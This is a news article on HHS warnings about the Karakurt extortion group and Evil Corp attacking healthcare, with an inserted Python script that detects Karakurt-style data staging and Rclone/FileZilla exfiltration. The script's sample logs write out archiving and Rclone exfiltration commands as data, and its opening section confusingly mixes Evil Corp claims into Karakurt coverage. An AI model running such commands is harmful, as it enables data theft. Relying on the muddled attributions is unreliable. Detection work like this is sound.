
HHS Warns, Karakurt Ransomware Group Targeting Healthcare Providers


The US Department of Health and Human Services Cybersecurity Coordination Center (HC3) recently issued a warning about rising Karakurt activity against the healthcare sector. The department has now issued a new warning about Evil Corp attacks.

According to the alert, Evil Corp is reportedly obtaining intellectual property from the United States healthcare sector on behalf of the Russian government. Evil Corp's Dridex trojan is capable of compromising the confidentiality and availability of operational systems and data, including financial and health data.

The threat actor has constantly changed its tactics in order to avoid sanctions imposed by the US government, causing millions of dollars in damage.

Evil Corp has a wide range of tools and techniques at its disposal, which it frequently combines with commodity malware and off-the-grid tactics. Furthermore, HC3 is concerned because nation-state-sponsored threat actors, such as Evil Corp, see data exfiltration as a cost-effective way to steal intellectual property.

In addition, Evil Corp makes no distinction between large and small organisations, preferring to strike wherever there is an opportunity. According to HC3, Karakurt has compromised at least an assisted living facility, a healthcare provider, a hospital, and a dental clinic. The group has even turned its leak site into a searchable database, making it easier to locate victims.

The healthcare sector has long been a favourite target of cybercriminals, and this has only intensified since the onset of the pandemic. Various threat groups target the sector on a regular basis, so putting the necessary security measures in place is advised.

HHS Alerts Healthcare Workers on Karakurt Ransomware Group

A new wave of cyber attacks by the Karakurt ransomware gang has been reported against healthcare providers. The warning came months after CISA and the FBI disclosed operational technical details on the group, along with indicators of compromise and sample ransom notes.

A dentistry practice, an assisted care facility, a supplier, and a hospital were all impacted by the attacks. Experts assert that the healthcare industry should remain on high alert and keep watching for any signs of compromise.

According to HC3, Karakurt's "massive cyberbullying efforts against victims to disgrace them are what is most alarming."

Karakurt has been observed purchasing stolen login credentials, or buying access to already-compromised users from third-party initial access brokers, in order to reach victim machines.

Fortinet FortiGate SSL VPN appliances, Log4Shell, outdated Microsoft Windows Server instances, and outdated SonicWall SSL VPN appliances are just a few examples of the weaknesses the group is known to exploit to gain initial access.

HHS Alert 

Karakurt first emerged in late 2021 and, according to a warning from the Department of Health and Human Services Cybersecurity Coordination Center (HC3), is likely connected to the Conti ransomware organization, either through a working relationship or as a side business.

Given that the Conti ransomware organization has successfully attacked more than 16 healthcare providers since early 2021, federal agencies have long warned about the risk the sector faces.

Like other ransomware groups, the Karakurt actors claim to have stolen data and threaten to sell it on the dark web or release it to the public if their demands are not met. Ransoms range from $25,000 to $13,000,000 in Bitcoin, and the deadlines are frequently set to expire just one week after the attackers make contact.

According to open-source reports, Karakurt threat actors typically conduct scanning, reconnaissance, and collection against their targets for roughly two months. The group then attempts to gain access to documents containing private data, including Social Security numbers, medical record numbers, medical history, and treatment information. As is customary with ransomware, the gang retains the data and threatens its victims until they pay.

The recent Karakurt campaign against Methodist McKinney Hospital in early July provided evidence of this. The actors threatened to release the allegedly stolen material, but Methodist McKinney instead notified patients of the incident and of the ongoing inquiry into the potential data theft.

‘Karakurt’ Extortion Back with an Upswing


A new financially motivated attack group has recently been on the upswing, and unlike previous groups, it does not appear to be interested in deploying ransomware or attacking high-profile targets.

Accenture Security researchers have been investigating a group that calls itself "Karakurt," meaning "black wolf" in Turkish; it is also the name of a venomous spider common in eastern Europe and Siberia.

Karakurt specializes in data exfiltration and subsequent extortion, which allows it to operate swiftly. According to a report released on Friday by the researchers, it had already claimed more than 40 victims through September, 95 percent of them in North America and the rest in Europe.

Experts suggest Karakurt could be a trend-setter, and that similar groups may soon shift away from hitting large corporations or critical-infrastructure providers with ransomware and instead adopt a comparable exfiltration-and-extortion technique.

“The threat group is financially motivated, opportunistic in nature, and so far, appears to target smaller companies or corporate subsidiaries versus the alternative big-game hunting approach,” read the report.

According to Accenture CIFR researchers, Karakurt was first spotted by investigators outside Accenture Security in June, when it began building up its network and data-leak infrastructure. In August, the group registered its domains as well as the Twitter handle @karakurtlair. Shortly afterwards, the group carried out its first successful attack.

Accenture Security's collection sources and intrusion research identified the group's first target in September; two months later, the group named that victim on its leak site.

Karakurt's tactics, techniques, and procedures (TTPs) for infiltrating victim infrastructure, establishing persistence, moving laterally, and stealing data are similar to those used by numerous threat actors. The group frequently takes a "living off the land" approach, relying on the existing attack surface, i.e., using tools or features already present on the targeted system.

Once inside a network, Karakurt primarily sustains persistence through service installation, remote-management software, and the deployment of command-and-control (C2) beacons across victim environments via Cobalt Strike.

However, experts have noticed that the group recently appears to have changed its approach to backup persistence. Rather than deploying Cobalt Strike, Karakurt "persisted within the victim's network via the VPN IP pool or installed AnyDesk to allow external remote access to compromised devices," they stated. This enables the gang to move laterally by leveraging previously obtained user, service, and administrator credentials.

Researchers stated that the gang will also employ additional remote-management tools, such as the remote desktop protocol (RDP), Cobalt Strike, and PowerShell commands, to move laterally and locate relevant data to steal and exploit for extortion as needed.

Nevertheless, the group's attack pattern so far shows that it is adaptable enough to change its techniques based on the victim's circumstances. Karakurt can also evade detection in many cases because it frequently uses legitimate credentials for access.

Finally, to steal information Karakurt uses 7zip and WinZip for data compression, along with Rclone or FileZilla (SFTP) for staging and final exfiltration to cloud storage. According to Accenture Security, the staging folders used to exfiltrate data in these attacks were C:\Perflogs and C:\Recovery.
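The staging and exfiltration pattern just described (archivers writing into C:\Perflogs or C:\Recovery, followed by Rclone or FileZilla runs) is something a defender can look for in process-creation telemetry. The following is an added example, not code from the article, Accenture, or HC3: it parses a handful of constructed, simplified Sysmon Event ID 1-style log lines and flags events matching those two behaviours. The tool names, log format and the sample lines are assumptions made for the example.

```python
"""Flag process-creation events that match the Karakurt staging/exfil
pattern described in the article: archive tools writing into C:\\Perflogs or
C:\\Recovery, and Rclone/FileZilla executions.  Log lines are constructed
samples in a simplified Sysmon Event ID 1 style, not real telemetry."""
import re
from dataclasses import dataclass

# Staging folders named in the article (trailing separator avoids matching
# e.g. C:\RecoveryData).  Lower-case because Windows paths are case-insensitive.
STAGING_DIRS = ("c:\\perflogs\\", "c:\\recovery\\")
# Archiver and exfil binaries; these lists are assumptions for the example.
ARCHIVERS = {"7z.exe", "7za.exe", "winzip64.exe", "wzzip.exe"}
EXFIL_TOOLS = {"rclone.exe", "filezilla.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}


@dataclass
class Finding:
    host: str
    user: str
    rule: str
    command: str


def parse_event(line):
    """Parse key="value" pairs from one constructed log line into a dict."""
    return {m.group(1): m.group(2) for m in re.finditer(r'(\w+)="([^"]*)"', line)}


def exe_name(image):
    """Basename of the Image path, lower-cased for comparison."""
    return image.rsplit("\\", 1)[-1].lower()


def touches_staging(cmdline):
    low = cmdline.lower()
    return any(d in low for d in STAGING_DIRS)


def evaluate(fields):
    """Return the name of the matching rule, or None for a benign event."""
    exe = exe_name(fields.get("Image", ""))
    cmd = fields.get("CommandLine", "")
    if exe in ARCHIVERS and touches_staging(cmd):
        return "archive_to_staging_dir"
    # Built-in compression driven from a shell counts as the same behaviour.
    if exe in SHELLS and "compress-archive" in cmd.lower() and touches_staging(cmd):
        return "archive_to_staging_dir"
    if exe in EXFIL_TOOLS:
        return "exfil_tool_execution"
    return None


def scan(lines):
    """Run every line through evaluate() and collect the findings in order."""
    findings = []
    for line in lines:
        f = parse_event(line)
        rule = evaluate(f)
        if rule:
            findings.append(Finding(f.get("Computer", "?"), f.get("User", "?"),
                                    rule, f.get("CommandLine", "")))
    return findings


# Constructed sample events: lines 2, 3 and 5 should fire, lines 1 and 4 not.
SAMPLE_LOG = [
    r'EventID="1" Computer="WS-0412" User="CORP\jdoe" Image="C:\Windows\System32\notepad.exe" CommandLine="notepad.exe notes.txt"',
    r'EventID="1" Computer="WS-0412" User="CORP\jdoe" Image="C:\Program Files\7-Zip\7z.exe" CommandLine="7z.exe a -mx1 C:\Perflogs\hr.7z \\fs01\hr\*"',
    r'EventID="1" Computer="WS-0412" User="CORP\svc_backup" Image="C:\Users\svc_backup\AppData\Local\Temp\rclone.exe" CommandLine="rclone.exe copy C:\Recovery\out remote:bucket"',
    r'EventID="1" Computer="WS-0199" User="CORP\asmith" Image="C:\Program Files\7-Zip\7z.exe" CommandLine="7z.exe a C:\Users\asmith\Desktop\photos.7z D:\pics"',
    r'EventID="1" Computer="SRV-FIN01" User="CORP\admin2" Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" CommandLine="powershell.exe -c Compress-Archive -Path C:\Finance -DestinationPath C:\Recovery\f.zip"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit.host} {hit.user} [{hit.rule}] {hit.command}")
```

The archive-to-staging rule is specific enough to alert on by itself; the Rclone/FileZilla rule is noisy in environments where those tools are used legitimately, so it is best treated as a correlation signal, raised in priority when the same host produced an archive-to-staging finding shortly before.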

Researchers offered enterprises standard mitigation recommendations to avoid being breached and extorted by Karakurt, which, once it has stolen a victim's data, will call them repeatedly to pressure them into paying.